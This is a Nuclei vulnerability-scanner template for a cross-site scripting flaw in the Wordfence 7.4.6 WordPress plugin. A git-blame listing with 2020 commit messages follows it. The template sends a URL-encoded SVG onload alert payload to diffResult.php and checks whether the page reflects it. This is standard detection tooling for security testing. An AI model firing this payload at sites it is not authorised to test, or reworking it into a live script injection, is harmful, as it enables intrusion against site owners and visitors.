nuclei-templates/vulnerabilities/wordpress-wordfence-xss.yaml

id: wordpress-wordfence-xss

info:
  name: WordPress Wordfence 7.4.6 Cross Site Scripting
  author: madrobot
  severity: medium

requests:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/wordfence/lib/diffResult.php?file=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E"
    matchers:
      - type: word
        words:
          - "<svg/onload=alert(1337)>"
        part: body
Update and rename WordPress Wordfence 7.4.6 XSS.yaml to wordpress-wordfence-xss.yaml 2020-04-08 16:49:00 +00:00			`id: wordpress-wordfence-xss`
Create WordPress Wordfence 7.4.6 XSS.yaml 2020-04-08 12:06:42 +00:00
			`info:`
			`name: WordPress Wordfence 7.4.6 Cross Site Scripting`
			`author: madrobot`
Fix syntax 2020-05-24 22:19:21 +00:00			`severity: medium`
Create WordPress Wordfence 7.4.6 XSS.yaml 2020-04-08 12:06:42 +00:00
			`requests:`
			`- method: GET`
			`path:`
			`- "{{BaseURL}}/wp-content/plugins/wordfence/lib/diffResult.php?file=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E"`
			`matchers:`
Update WordPress Wordfence 7.4.6 XSS.yaml 2020-04-08 13:27:59 +00:00			`- type: word`
			`words:`
Fix syntax 2020-05-24 22:19:21 +00:00			`- "<svg/onload=alert(1337)>"`
uniform format 2020-08-31 18:34:29 +00:00			`part: body`